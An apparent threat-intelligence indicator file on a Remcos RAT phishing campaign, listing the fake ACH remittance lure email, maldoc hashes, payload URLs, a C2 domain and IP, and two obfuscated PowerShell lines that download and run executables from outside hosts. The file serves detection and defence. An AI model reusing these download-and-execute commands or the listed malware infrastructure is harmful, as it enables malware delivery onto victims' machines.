-
Notifications
You must be signed in to change notification settings - Fork 84
/
2021-10-15 Remcos IOCs
63 lines (46 loc) · 1.41 KB
/
2021-10-15 Remcos IOCs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
THREAT IDENTIFICATION: REMCOS
SUBJECTS OBSERVED
ACH Remittance Advice
Remittance
SENDERS OBSERVED
EMAIL BODY
Payment receipt
Invoice #2020821
for ACH Remittance Advice
Paid on OCTOBER 15,2021
The Ink Supplies Corp
2093 PHILADELPHIA PIKE #5003
Claymont, Delaware 19703
United States
Kindly confirm receipt
Best Regards,
Accounts Payable
MALDOC FILE HASHES
ACH Remittance Advice.xls
114ca1de991bc21ca9b88481de97cf92
Remittance Advice File.xls
ca027182d31698dcbb704e0d1a7c28d2
travelespecially.cmd
5ea928ce876726d313001f5cbd14bc65
POWERSHELL FROM MALDOC
C:\Users\analyst\Documents>powershell -w hi sleep -Se 31;Start-BitsTransfer -Sou
rce htt`p://greenpayindia.com/wp-conternt/ConsoleApp18.e`xe -Destination C:\User
s\Public\Documents\brotherneed.e`xe;C:\Users\Public\Documents\brotherneed.e`xe
C:\Users\analyst\Documents>powershell -w hi sleep -Se 31;Start-BitsTransfer -Sou
rce htt`p://thepunchlineexpose.com/Manager/AnyDesk.e`xe -Destination C:\Users\Pu
blic\Documents\weekshe.e`xe;C:\Users\Public\Documents\weekshe.e`xe
PAYLOAD DOWNLOAD URL
http://greenpayindia.com/wp-conternt/ConsoleApp18.exe
http://thepunchlineexpose.com/Manager/AnyDesk.exe
REMCOS PAYLOAD FILE HASH
brotherneed.exe
aade455507f667318c83c42a95b3fc3c
It was renamed and copied as:
notepad.exe
aade455507f667318c83c42a95b3fc3c
REMCOS C2
lplazadtemins.duckdns.org:443
194.147.140.45:443
SUPPORTING EVIDENCE
https://tria.ge/211014-ye79wababj